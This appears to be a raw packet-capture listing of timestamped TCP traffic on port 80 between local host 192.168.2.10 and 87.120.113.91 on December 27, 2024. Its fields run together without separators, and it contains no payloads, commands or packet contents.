                                                        Dec 27, 2024 14:53:43.343983889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.344757080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.344788074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.344799995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.345601082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.345639944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.345715046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.346456051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.346489906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.346548080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.347362995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.347403049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.347448111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.348187923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.348270893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.348290920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.349033117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.349078894 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.349143982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.349986076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.350047112 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.350071907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.350806952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.350847960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.350925922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.351656914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.351694107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.351730108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.352504969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.352571011 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.352605104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.353370905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.353419065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.353527069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.354260921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.354299068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.354332924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.355091095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.355132103 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.355209112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.355987072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.356025934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.356064081 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.356800079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.356837988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.356873989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.357671976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.357706070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.357790947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.358546972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.358586073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.358638048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.359384060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.359422922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.359487057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.360243082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.360295057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.360366106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.361123085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.361161947 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.361207008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.361967087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.362004042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.362076044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.362814903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.362827063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.362876892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.363790989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.363828897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.363850117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.364634991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.364664078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.364707947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.365551949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.365564108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.365597010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.412636042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.437323093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.437403917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.437448025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.437633991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.437745094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.437777996 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.438510895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.438631058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.438673019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.439415932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.439469099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.439507961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.440265894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.440372944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.440412998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.441107035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.441241980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.441274881 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.441955090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.442018986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.442054987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.442503929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.442595005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.442627907 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.443391085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.443559885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.443607092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.444262981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.444329023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.444364071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.445090055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.445214033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.445250034 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.445938110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.446080923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.446114063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.446788073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.446896076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.446934938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.447669983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.447691917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.447770119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.448503017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.448637009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.448676109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.449373960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.449482918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.449523926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.450225115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.450352907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.450392962 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.451093912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.451231956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.451271057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.451989889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.452085972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.452130079 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.452824116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.452915907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.452961922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.453686953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.453810930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.453850031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.454551935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.454655886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.454698086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.455442905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.455503941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.455542088 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.456278086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.456463099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.456504107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.525976896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.526001930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.526055098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.526211023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.526302099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.526339054 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.526874065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.526971102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.527005911 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.527734041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.527813911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.527856112 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.544754028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.544917107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.544975996 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.545140982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.545188904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.545224905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.545857906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.545979023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.546020985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.546695948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.546802998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.546847105 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.547549963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.547663927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.547713995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.548403978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.548504114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.548547983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.549267054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.549385071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.549422979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.550151110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.550246954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.550286055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.550997019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.551103115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.551142931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.551870108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.551953077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.551991940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.552772999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.552886963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.552923918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.553579092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.553695917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.553735018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.554426908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.554546118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.554586887 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.555279016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.555357933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.555397987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.556487083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.556566954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.556603909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.557054996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.557121992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.557161093 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.557914972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.557946920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.557980061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.558762074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.558856964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.558892965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.559604883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.559705973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.559746981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.560489893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.560564041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.560605049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.561343908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.561448097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.561486959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.562187910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.562295914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.562334061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.563047886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.563154936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.563196898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.563918114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.564054966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.564095020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.564780951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.564893007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.564935923 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.565639019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.565738916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.565782070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.566497087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.566577911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.566618919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.638573885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.638588905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.638670921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.638736010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.638828039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.638875961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.639609098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.639753103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.639799118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.640453100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.640563965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.640604019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.641339064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.641474009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.641515017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.642227888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.642349958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.642384052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.643049002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.643150091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.643191099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.643932104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.644052029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.644092083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.644785881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.644927979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.644967079 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.645644903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.645663023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.645698071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.646490097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.646609068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.646646023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.647433043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.647581100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.647625923 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.648206949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.648334980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.648379087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.649128914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.649219990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.649260998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.649940968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.650077105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.650121927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.650799036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.650928974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.650971889 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.651649952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.651812077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.651849031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.652575016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.652651072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.652690887 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.653378010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.653450012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.653486967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.654258013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.654333115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.654376984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.655149937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.655242920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.655281067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.655982018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.656127930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.656172991 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.656821012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.656939983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.656982899 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.657716990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.657731056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.657774925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.736351967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.736418962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.736483097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.736731052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.736854076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.736888885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.737637997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.737775087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.737811089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.738439083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.775115967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.775182009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.775245905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.775413990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.775451899 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.775489092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.777439117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.777515888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.777729988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.777904034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.777949095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.778744936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.778759956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.778770924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.778784037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.778832912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.779612064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.779772043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.779815912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.780447960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.780461073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.780494928 CET4972180192.168.2.1087.120.113.91
